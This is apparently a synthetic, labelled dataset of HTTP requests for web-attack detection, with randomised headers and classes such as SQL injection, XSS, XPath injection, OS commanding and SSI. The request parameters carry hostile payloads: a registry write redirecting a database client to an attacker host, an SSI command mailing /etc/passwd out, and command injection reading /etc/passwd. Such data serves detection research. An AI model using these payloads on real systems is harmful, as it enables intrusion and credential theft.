User-Agent: Mozilla/5.3 (compatible; MSIE 8.1; Linux i386; hac1sv; tdjehii; fHoiq)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 987x1282
Via: 1.2 63.32.107.4
Transfer-Encoding: gzip
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 59.196.39.49
X-Serial-Number: 9140776636485
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47059
Start - Id: 41108
class: SqlInjection
GET /39ol3Rx/nMf@v/s0_fY@iytrENW/eq.HbQIqL9xO5.jpeg?rueralotmk=lq4RngC4QrRJ&iuiauSrmfz3co=2250229&pv=456&wyoAuc=57&cLelh=646908&Ioteoainliogo=exec+++++xp_regwrite+%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%272tiowPwEEd%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&rg8iiEngapnoh78=csP HTTP/1.1
Host: www.6yAedowvdr.gov:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress
Accept-Language: tist-sgrlq, htte-90traud0, ij5-lsmn;q=0.2, h-ihma, sidlxuVt-N;q=0.6
Cache-Control: only-if-cached
Client-ip: 212.123.245.198
Cookie: cprltyeek=agmt1;VbF_SuJtelnetTVdivn=1;udteN4l=shfrticyeee;@sIVa7m4P45=70;0h2e3tnrwchwL9e=038
Cookie2: $Version="183"
Date: Fri, 03 Sep 04 23:23:43 UTC
ETag: "08c.BwX7mSH8DfY"
Expect: iCconail
From: ljbnc@t4tt.net
If-Modified-Since: Fri, 05 Nov 04 20:47:13 CET
If-Unmodified-Since: Tue, 21 Nov 06 23:51:28 CET
If-Match: *
If-None-Match: *
If-Range: "Ggq11yjwKPT7am@PB"
Max-Forwards: 19
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: Basic aWc3dmVlZWE6bnR1YQ==
Range: -397
Referer: /tae6/eelssiar/xbt9pep/ecsm.gz
TE: gzip
Trailer: Accept-Language
User-Agent: ouceemE9atll
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/6.8 237.8.7.43
Transfer-Encoding: matoan; jymwutb=eigrn
Upgrade: s3t/0.2, css/4.1
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 50.70.237.114
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41108
Start - Id: 46545
class: XSS
GET /<SCRIPT>/? HTTP/1.1
Host: www.gdntusytU8.org:24486
Connection: keep-alive
Accept: video/mpeg;q=0.2, image/*;q=0.1, image/png;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 169.245.13.19
Cookie: srnblaIaksxt=1823
Cookie2: $Version="0"
Date: Tue, 21 Nov 06 14:48:04 CET
ETag: W/"u2fAqilJFYAF0Ew"
Expect: atpSh=pnachAn
From: ns7rogjc@npah.it
If-Modified-Since: Sat, 17 Jun 06 03:18:15 CET
If-Unmodified-Since: Sun, 08 Jun 08 23:39:43 GMT
If-Match: "iLOhLxoR3j4_-XKb."
If-None-Match: "hPGt9QnybP6VRaKXg"
If-Range: Wed, 30 Dec 09 11:28:25 CET
Max-Forwards: 91
MIME-Version: 6.0
Pragma: nLt4dRoh='eara'
Proxy-Authorization: Digest username="rgww0see"
Authorization: Digest uri=/heoeOt8.bin
Range: 2794-2,-4107
Referer: /53Ka/crribga.png
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/3.3 (Windows; U; WinNT 6.0; yx-y0; rv:2.7.8) Gecko/59856280
UA-CPU: 68000
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 139x000
Via: 3.6 www.leDaou.jpeg, 1.5 36.110.101.55
Transfer-Encoding: gzip
Upgrade: m51if/7.5, rhhtal/3.2, em5Twu/2.8, pvaaul/4.8, ar9/6.0
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 46545
Start - Id: 49503
class: XPathInjection
GET /wewZsMsfmstoe0ee/dnnV8Y/dtD/sYWD/e2mpPV05F/mghtoexhr3e19/nvgIFHT299NKHs/ntci4spmrkoltla/qlZ0DSHxrKYXHdT/xhomehomeRFs7l_8Zrgo/IqelxHd/YKY.png?wrtdtas=ticioqsoc&htWd=locationvr&QR7v=d&8tea3eass=oFE9Q&9cmTvebrra=po6al&eezrpi=ftbAa%2FauAv%2Fsboszr%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D6%5D+or++%27tmEtodd%27++++%3D++%27&.Noa9UlogdxR9k=i1te&lonTCn33aXiat=98198&nTosratjPs0qeou=135360&Mdk4lTL7telnetm=ntx3fnchq9an&n1nheen=gg1nioNoh3nhEc&RLdIKCAsopenbKk=49&t8=5149413644&5getut=%24e%2F&ce8el57qu0npaa=02141 HTTP/1.1
Host: 95.76.249.201
Connection: aeotieLn
Accept: application/postscript
Accept-Charset: x-mac-greek, iso-8859-9;q=0.8, x-mac-hebrew, iso-8859-8-i;q=0.7
Accept-Encoding: 
Accept-Language: ou-ns, tm0-lEydmVn;q=0.8, e-Uablfte
Cache-Control: max-age=1
Client-ip: 137.244.0.145
Cookie: NTp5pchildgax1M=uyscriptnnnl y
Cookie2: $Version="238"
Date: Mon, 20 Mar 06 21:46:16 GMT
ETag: W/"vdwNvb46rS8r1KeBCz3"
Expect: 100-continue
From: amlp2vta@vfese.gov
If-Modified-Since: Sun, 18 Jun 06 07:37:29 GMT
If-Unmodified-Since: Sat, 19 Jun 04 06:56:04 CET
If-Match: "HtFult-uQ-8UwOYu"
If-None-Match: "1_@.nByJ_9pc-HDWlxql"
If-Range: "-9BPWH.4WlUwV-5q-HX2"
Max-Forwards: 5213
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: oou7tu fstmaHe6=oaua
Authorization: tnh1u rsoensn=Sbuoti
Range: 2-801463,7709-,5-5829
Referer: http://arda.ch/nsakE/eREa/ebod9.doc
TE: trailers
Trailer: Authorization
User-Agent: fsDss/7.6.0.3
UA-CPU: StrongARM
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4726x3292
Via: FTP/5.2 www.ttesimhh.png:22687
Transfer-Encoding: dhce; idx1biho=ietT5Dtt
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 063 21.35.61.71 "elaoim3oti" 
X-Forwarded-For: 113.38.28.52
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49503
Start - Id: 42999
class: OsCommanding
PUT /IeeamblTfT3i/oZ/e2cPB8xa/0sssoosr/gUH1U3Ltw/d2CdGdvJ-rzDr0zw1/uXA.XHNE42.W/ayselgsIb6eYmbbn/oPQ0GQxZWaI-kUK3-/krd19HweK6a/eo81ltrhgvrX/rdO41uR5mIP6ZZ.css? HTTP/1.1
Content-Length: 259
Content-Language: srttgp
Content-Encoding: compress
Content-Location: /tpdl/lcniLt/stkr.php
Content-MD5: T21lYWhzaWZlbmVlbnQ1RA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 27 Mar 06 05:26:41 GMT
Host: www.ieLTsLast.cz:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-8-i, koi8, iso-8859-5;q=0.7, koi8
Accept-Encoding: *
Accept-Language: 0ceao-wve, saHtR-itcuNt7;q=0.4, 8I9l-elpTt;q=0.8, iAfee-Ohnesowy;q=0.1, a-rR;q=0.3
Cache-Control: max-age=0
Client-ip: 7.119.147.200
Cookie: Fs2GxyQ=unionlrElSftp rpsi7between;bZEaWZe8log=esSMc/nyo
Cookie2: $Version="16"
Date: Mon, 20 Jun 05 06:26:23 GMT
ETag: W/"EOvZtIdss-Rbcsa0"
Expect: 100-continue
If-Modified-Since: Sat, 14 Jun 08 06:09:34 GMT
If-Unmodified-Since: Sun, 03 Sep 06 06:12:02 CET
If-None-Match: *
Pragma: no-cache
Referer: /enardsis/xairai/0esl.cgi
TE: deflate,deflate;q=0.1,deflate;q=0.3
User-Agent: uotet1obrc
Via: FTP/4.9 www.aB7a.htm
Warning: 661 218.41.109.182 "etat9dhap3oaGlsrt" "Tue, 27 Jan 09 24:39:33 UTC"
X-Forwarded-For: 225.212.15.105

atiure0emaA1fSy=arrt&tnal=eaaosl3Aefz&8rh9dkedha=re&U8bRle=mpd&ididAEthkegVAtr=tztamDi&eerIh8=opt&z9ued4=775073&sn9icpoernao=toAQNQgNF&SspvssCe=esor&ntM=411180&pEtnertejn=isrs&s7hvhls7ro3=615115185&2Kga=%0a    cat  %0a/etc/passwd%0a&ia3aevu2wgt0=rJc

End - Id: 42999
Start - Id: 49969
class: XPathInjection
GET /ea6aeh/ecKV0SNCSORoca/yePF/m6vrPin-xFpHq/dpnywesinpo9tHhbs/n0m/utoswti3nwealsjels/tOxXQvjZmbdhs4DDx2i.js?gtou5tleNldaiar=99864977&esihhah=iL8ws%27%5D+++++%7C++++P++++%7C+++++%2F%2Fuser%5B+name%2Ftext%28+++%29++%3D+++%27ny&riphzuEnodtg=6 HTTP/1.1
Host: 54.181.125.172
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: compress, gzip;q=0.5
Accept-Language: hi8-e, edoresE-hc0ad, wRr-tyaier;q=0.4, h-s5bce;q=0.7, hAseettZ-unpaehw;q=0.5
Cache-Control: no-store
Client-ip: 164.99.223.41
Date: Thu, 02 Feb 06 07:46:01 CET
Expect: ahthray
If-Modified-Since: Wed, 11 Jul 07 04:45:53 UTC
If-Unmodified-Since: Fri, 15 Sep 06 14:27:21 UTC
If-Match: *
If-Range: Sun, 14 Aug 05 13:04:39 CET
Max-Forwards: 89
MIME-Version: 2.7
Pragma: rd='pet'
Authorization: Digest response="fd530FB1f4d6e6B5795Acf09EE08cC4F"
Referer: http://www.qhhdnret.st/exot/fiism/9cfoel.ace
TE: trailers,deflate;q=0.3,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/4.1 (compatible; Konqueror/7.7; Open BSD i386; ven1f)
UA-OS: Linux
Via: eon/8.4 118.143.237.205
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49969
Start - Id: 43114
class: OsCommanding
GET /a1lPhetgZth/eucauqisRXi/iDqv/uOlF5G/ow_NjksFu/dr89wzAeTSeUThua/gDctnriuh0seajgedopn/r9@j6HrBv9Z/Lmpe0ILm/ilLm/tTJv9_Jpb7zv5.msf?xmspee=%5Cn+++++uftp++++-p+www.rigeiengchnt.com+++%2Fer%2Fesicnd%2Flanian%2Fasit%2Froit%2Fllel&nsmneo=eeuNa&Is=nodeNkp&gWyimgH1=638 HTTP/1.0
Host: 57.126.168.121
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: iso-2022-kr;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 107.157.218.192
Cookie: itisEbtohe=iBX9fbNh@m
Cookie2: $Version="389"
Date: Sat, 21 Oct 06 20:02:32 UTC
ETag: "WV@RnoNoblIi_WrxHi"
Expect: 100-continue
From: 5aEtd@kfeetndtk6.de
If-Modified-Since: Tue, 09 Oct 07 10:02:17 CET
If-Unmodified-Since: Fri, 04 Apr 08 24:38:37 GMT
If-Match: "DvI21gE0KqW.64h_"
If-None-Match: *
If-Range: "0TpZeFNLd1lmCS8-6wEC"
Max-Forwards: 4537
MIME-Version: 9.7
Pragma: ss='gh'
Proxy-Authorization: NTLM dHNudGs5YWFpZGVvb2hueTZxbWVocmw4VUlTaXRoZ2F1bmlyVHNIdDlSZlVwaW9l
Authorization: ebLw xtl4r=t6xue5
Referer: http://ae8h.biz/jqabap/7gsoet.nsf
TE: trailers,deflate,trailers
Trailer: Connection
User-Agent: Mozilla/6.7 (X11; U; Open BSD i386 0.4; wm-CI; rv:7.4.0) Gecko/35184920
UA-CPU: StrongARM
UA-Disp: 046,4473,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 603x2268
Via: 5.8 www.ndqgd.css, Teg/7.3 63.251.131.119
Transfer-Encoding: gzip
Upgrade: Fgohbd/4.1
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43114
Start - Id: 48951
class: XPathInjection
GET /xzxPopenXuQ/cah8e/thelgrfm/abPRj1x-0Q@eUIF73E/d5pg1I4HMuTu_CDBs/h6ic7etssa/ofr8ZF-VKFOB/t5sgvWP.nsf?unigrtsatpno=7025+++or++wt%2Fvar%2Fyntah%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D59%5D+++++or++0283%3D&45r3o0L=+cb1aco HTTP/1.1
Host: 53.62.218.100
Connection: scs4e
Accept: image/gif, text/*;q=0.4
Accept-Charset: gb2312
Accept-Encoding: 
Accept-Language: s-aoeogar;q=0.0, Clnd-stopI8pe
Cache-Control: min-fresh=889
Client-ip: 143.194.93.206
Cookie: tdOa8iajweD8h=yIUZq;aeei9u8ltr=dsataktp6m;oftq6Rtwdee=73
Cookie2: $Version="818"
Date: Mon, 29 Dec 08 09:02:27 CET
ETag: W/"q2@mOjBBnZF6EGkRzYy_"
Expect: 100-continue
From: ietdnl@1aln.fr
If-Modified-Since: Thu, 25 Aug 05 12:25:48 CET
If-Unmodified-Since: Thu, 06 Aug 09 17:35:08 GMT
If-Match: *
If-None-Match: "2VzXCwtDhMwVchTT4O"
If-Range: Sat, 03 Jul 04 20:09:58 GMT
Max-Forwards: 054
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: Basic NnplZ3Y6ZXl1aQ==
Range: 5-
Referer: http://www.m0tb.ch/eeedibtb/mtoeUd1a/5az2b/olmcisl/osohe.conf
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Eoler (mmgOK1m3H; eR-gmTom; fVaNRfr; a1QcFa4)
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2276x9830
Via: ieugo/6.8 www.Tos7pO.js, 2.5 www.islun.tiff, ogpsx/1.4 www.iacLnt.png:0
Transfer-Encoding: compress
Upgrade: 6kse/1.8, ssz/9.9, tathn/5.4
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 238.131.71.180
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48951
Start - Id: 39284
class: SSI
GET /v2emh5hebj/c0/epmc.jpg?I0BlCboot.inikZh=pn6h7crbHzXa&ayudDut3ztOb=4463&A7iro1=atw&nawSatEpswnlti=%3C%21--%23email+fromhost%3D%22www.l9ieue.com%22+tohost%3D%22mailbox.e3un.com%22+message%3D%22odtooe+6oplmRy+H8twa+d5n6je%22+fromaddress%3D%22tmpb7s.com%22+toaddress%3D%22fasv.ea.com%22+subject%3D%22rHt%22+sender%3D%22deAm.com%22+replyto%3D%22cFnire.com%22+cc%3D%22iets%22+inreplyto%3D%22so+0noo+octwuc%22+id%3D%22tnsmail%22+--%3E&relvadOefj=lLuSj6ZePU HTTP/1.0
Host: 215.228.6.3
Connection: close
Accept: audio/x-wav;q=0.7, image/*, video/mpeg;q=0.6
Accept-Charset: ks_c_5601-1987;q=0.6, windows-874
Accept-Encoding: 
Accept-Language: my-ar;q=0.9, s1ft1Mx-xljI, cvd5ase-ngoitoy, ln-et
Cache-Control: no-cache
Client-ip: 178.60.27.113
Cookie: uc=7asOooi
Cookie2: $Version="4"
Date: Thu, 26 Jul 07 17:11:01 GMT
ETag: "t7BklJYd9L3k2qZkG"
Expect: 7ehtki=bTu9Ses8;hrEiTf2
From: tdoqaue@tuogttti.uk
If-Modified-Since: Tue, 18 Sep 07 18:48:48 CET
If-Unmodified-Since: Mon, 01 Jan 07 22:50:26 GMT
If-Match: "r.g1wyS60s0P8I0v@"
If-None-Match: *
If-Range: Sat, 05 Sep 09 18:28:50 GMT
Max-Forwards: 63
MIME-Version: 8.4
Pragma: ieyern=w
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: 2ehebr earold=vh8oet
Range: 419016-,344-
Referer: /whicihs.gif
TE: chunked,deflate
Trailer: Via
User-Agent: v_asWwh http://www.71ip.net
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 320x017
Via: FTP/9.9 www.neel.jpeg
Transfer-Encoding: deflate
Upgrade: tfe/7.8, osw/0.1, o7E/9.0, t4ii/3.0
Warning: 483 65.103.137.245:57 "ttdilrdtdatlrn" 
X-Forwarded-For: 79.195.23.179
X-Serial-Number: 729426151535484
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39284
Start - Id: 39953
class: SSI
GET /Lm_n4T/Gd63JF10UEY/ueen4binwpEbYlr/eu6GFOeHrg2VUH0_mT/nH-/es9eioreitsyh/fsw8/CcaySo73wp-/ipe3intee/sajRigjMiA1jc..jpg?et60xeO=76&ei2aec=6040646&be=formxirr9%26bezrce%7Eu&srjs=%3C%21--++++%23exec++cmd%3D%22%2Fbin%2Fmail+++++fxh.com++++%3C++%2Fetc%2Fpasswd%22--%3E&-iiTJGMWsock_streamc3=0136&o0sqbsouds7rr=t&Bunh=kwqaxL2uaU&To6m.wZlikeFrW=lC&nn6diotamhre1a=copysRin%29nlgqef HTTP/1.0
Host: www.mele.st:41421
Connection: close
Accept: */*
Accept-Charset: windows-1258;q=0.6, hz-gb-2312, windows-1255;q=0.3, x-mac-chinesetrad
Accept-Encoding: gzip, gzip, compress;q=0.1, compress
Accept-Language: d9RnoD-ueti7l, rg-n
Cache-Control: no-cache
Client-ip: 225.57.174.238
Cookie: tO= h]imeta47R;dt9aI=18502;wsdr1=298045
Cookie2: $Version="1"
Date: Thu, 16 Nov 06 01:46:04 UTC
ETag: W/"kT0uPx4hGu-xBjDxNmhh"
Expect: 100-continue
From: uaoalish@aer2rer6.org
If-Modified-Since: Thu, 14 Sep 06 22:13:15 UTC
If-Unmodified-Since: Sat, 12 Feb 05 20:44:59 CET
If-Match: "jbJ2IOkI4e82P-L"
If-None-Match: "Pc@1F_CdgiG-tM5Uc"
If-Range: *
Max-Forwards: 6
Pragma: ule9='r1nxshEn'
Proxy-Authorization: Digest response="ac4BeDAbEcd7D693f5c14DA2968662dc"
Authorization: 8wet r7glwds=orarogta
Referer: http://www.Qrirth.biz/e25rlt0s/6a4aa0/yH1ssq.php4
TE: gzip,chunked;q=0.1,chunked;q=0.0
Trailer: Connection
User-Agent: tZ2O5fPXLK http://www.ri9uhtsb.fr
Via: FTP/8.0 www.yeawkaHs.shtml, 5.8 www.zIitmnNa.js
Transfer-Encoding: compress
Upgrade: BEt/7.6, h1sd/6.5, roeKws/7.5, meae/9.7, Tufb6/3.7
Warning: 920 2.33.97.58 "exoEohddhnP0c4dewku" "Sun, 06 Apr 08 17:14:18 CET"
X-Serial-Number: 754321
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39953
Start - Id: 47967
class: XSS
GET /pPvWdrop6v_ckuPnc/u-z/6iT/yEsiifUI1/hEfHhjzEqhFOYw6Q/eansteo/b2Rc4q2nstuZXLCy9FsX/fkfh9D5/hnotnshwleOhiiuetoad/rAfDta_JbtYsX1xx@TId.dll?lnar3=%3Cimg++dynsrc+%3D++%22javascript%3A+%5Balert+%28%27elesei7vot%27%29%3B%5D++++%22+++%3E&Hh2oa=73692&0tOsak9mgaed=7mailnm&ot=raic&fg67ib..n-e=p1UuGPVW-gJ HTTP/1.1
Host: www.9hNvep.it
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: iusft-oarctbag
Cache-Control: no-cache
Client-ip: 132.116.1.254
Cookie: yiipnen=2dmNce0u(y
Cookie2: $Version="96"
Date: Mon, 13 Jun 05 03:24:32 UTC
ETag: "09Q5lWaU@8rfp_chN"
Expect: htoXndn
From: isoa@fisS8tee.org
If-Modified-Since: Fri, 05 Sep 08 06:50:04 UTC
If-Unmodified-Since: Tue, 12 Dec 06 06:39:23 UTC
If-Match: *
If-None-Match: "x_fmekkz9XmgoSr4mBbO"
If-Range: "8JaKfdegVSvYkPXq"
Max-Forwards: 6295
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: cdaead o0tyni=dtuinus
Authorization: Basic QXpSb255dTpsQTBk
Range: -89
Referer: http://www.Sbhnlnda.cz/ndoNef.mp3
TE: chunked;q=0.0
Trailer: If-None-Match
User-Agent: Mozilla/5.4 (compatible; Konqueror/0.9; SunOS sun4u; Nowasolcn9)
UA-CPU: 68000
UA-Disp: 533,4650,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3364x532
Via: FTP/9.0 89.31.229.215
Transfer-Encoding: gzip
Upgrade: m0r/9.6, lyeto/5.9
Warning: 193 185.105.110.73:7 "etrva5uwtemespwn" "Wed, 04 Oct 06 16:34:42 CET"
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 546551972
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47967
Start - Id: 49568
class: XPathInjection
GET /7-D@XmalljallUI/Zzcz@PR_@x/dz5Hb8beX@BoIy/PinzWoQbEi0si19a5dh/JyI/liy13iZO8Ty.htm?ByNallshutdownqF=EconnectosrEre&egs=lj&Uf4hEhrrTns=e2755T&hleou=027038&eENdPefNerf0tab=ttarhtsm&o6aamh0a6l9=ae%27%5D+%7C+++P+%7C+%2F%2Fuser%5B++++name%2Ftext%28+++%29++%3D++%2744&vbsaliewgsi=c3th&ixyiilipeete2L=connect&y3MRg=taagopv1c3&tcitn=nwrcL HTTP/1.0
Host: 107.97.3.103
Connection: close
Accept: video/*;q=0.8
Accept-Charset: us-ascii
Accept-Encoding: 
Accept-Language: lHyn-fnEfntDk, 8csi-meuVo
Cache-Control: no-transform
Client-ip: 244.186.225.107
Cookie: NshutdownZhP=8562;Fttr6eh1wlw2iI=991065
Cookie2: $Version="6"
Date: Tue, 20 Feb 07 09:21:38 GMT
ETag: W/"RwlbG4OPwxlnRS2"
Expect: rai8lT=iouvqGee;fouiTcye=n37l
From: rZ7t1wz@obusg.st
If-Modified-Since: Sat, 03 May 08 01:40:51 GMT
If-Unmodified-Since: Tue, 31 Mar 09 16:49:31 UTC
If-Match: "lMf3_lfv-awJc@89w@"
If-None-Match: *
If-Range: "EGmYmKYB-sd5IV8AxM"
Max-Forwards: 045
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: eeftuo sfagt=srres
Authorization: Digest realm
Range: -351866,-996363,00-
Referer: http://www.rsfhs.be/otztl/oeeree.wav
TE: trailers
Trailer: Range
User-Agent: 2cemsrczdeb
UA-CPU: Sparc
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9192x115
Via: eso/3.0 154.226.69.16, HTTP/8.8 www.ypltEa.jpeg
Transfer-Encoding: 0bec; yErt=8T3mApj
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 4750592519886658439
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49568
Start - Id: 42241
class: SqlInjection
GET /wtmmwedearaer/gyihv7joEbcsehrfiitn/nttorspls1n/tsndNectcE2N/9azXG23Nuz/9bfv-IWci/c2orOgi/E@O/lp/DqfqlinkjIu0/Y8Cj1asP1Wp3/oZv.js?twz2ncrkRqe=in+&oiaeDgxp=Das7m&oDatd=desen&rcse=xc9setsnn&oaopw=%27+%29++++UNION+++++ALL+SELECT++84%2C0%2C949%2C271%2C424+++++FROM++t9Hyrhuddt++WHERE+%28++%27%27+%3D%27&Xi=0Hhh9&mafroumTucanu2=wblocationb&or4iIymoahrzu5b=Ur3r&n9m=98002 HTTP/1.0
Host: 244.216.113.65:20
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: nrEhb-nc
Cache-Control: only-if-cached
Client-ip: 104.162.121.20
Cookie: fra1oeos= 0etud l3ut ;DfHe1dCMjR=9;he2egNaefe=IrJe xvet-iems9
Cookie2: $Version="26"
Date: Tue, 17 Jan 06 14:00:16 CET
ETag: W/"I_dMSOn75Rh5PGE"
Expect: 100-continue
From: AhkTtd8@hidg5ir.de
If-Modified-Since: Fri, 06 Jun 08 18:00:55 GMT
If-Unmodified-Since: Fri, 02 Dec 05 05:15:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 61
MIME-Version: 7.5
Pragma: eRot='7e9rdKid'
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: jlaeo nf6ee7he=tqriai
Range: 4539-14148,-19,934-
Referer: /aEpTdhaL/maeu0lyi/efuemit/xehnn/hvjeles.pdf
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.0 (Windows; U; Win98 1.0; 6d-nm; rv:8.9.6) Gecko/18559122
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 108x2342
Via: 9.3 www.zieguner.shtml
Transfer-Encoding: gzip
Upgrade: sssi/2.7, rim/3.4, mCeth/1.0, n82sil/5.7
Warning: 028 56.37.102.108 "t6tlhhan1eX2IilnhgP" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42241
Start - Id: 49320
class: XPathInjection
GET /deDrRgraeadterf/e75.MOy3b6ZlOOLT_1kY/e9Gs4KU_3obJEY9@/tnnBsoetltbudssuhm/ge.exe?efa=%2FhHtlte0mWGnLqeehzU&rsock_streamNcG=sechoo&ed=%27nfmoe%2B%24rcd&ged=4yWSR&eoyeemeznu=5164&ci3=6&s_tnE0X=u++suP%27sock_streamt&essamnte8dnthmn=33+++or++a2zde%2FwTseas%2FarKca%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D781%5D++or++++8674%3D&Va1oFtis=s2 HTTP/1.0
Host: www.xo0i.biz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: shift_jis;q=0.7, iso-8859-5, iso-8859-9, isiri-3342
Accept-Encoding: 
Accept-Language: norel-s;q=0.6, nFiNt-s;q=0.7, tmu-ftL, ttnne-tl4
Cache-Control: only-if-cached
Client-ip: 66.86.201.155
Cookie: 9xteIw=846177751;ieafesz8ye=u3uhome7%iHtodocumentL[oj3ms;acezehu=ciAgw@
Cookie2: $Version="4"
Date: Tue, 21 Mar 06 07:35:58 UTC
ETag: W/"D9yEuwsw2Z4OTng"
Expect: zsss
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Mon, 20 Oct 08 21:27:24 CET
If-Unmodified-Since: Sun, 24 Jul 05 15:31:54 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Oct 08 07:28:24 UTC
Max-Forwards: 50
MIME-Version: 7.2
Pragma: ele='htro'
Proxy-Authorization: Digest nonce
Authorization: 6rts7i fsehur=hewya
Range: 28823-,87212-
Referer: /udhylr/6tzl9s/ss3ham3e/mabtaer.cgi
TE: trailers,gzip,gzip;q=0.5
Trailer: Accept
User-Agent: e@30GXPFd http://www.rTi7ibG.gov
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: FTP/6.8 www.NeRfyr.png, 9.5 www.pelt.tiff
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 970 91.193.19.21 "6desenmdo" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 09521
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49320
Start - Id: 47253
class: XSS
GET /djFBJ@v2ms6ru@/rntepet.jpg?neyo5dima=%3Cstyle+++%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript++%3E%5Balert++++%28%27esac8i%27%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&rcpXcy=tt1nEi%3Eoi&sw1smratIpt5=+Uncb&smtr=oN HTTP/1.0
Host: 138.173.210.239
Connection: keep-alive
Accept: video/*
Accept-Charset: windows-874;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 41.54.252.143
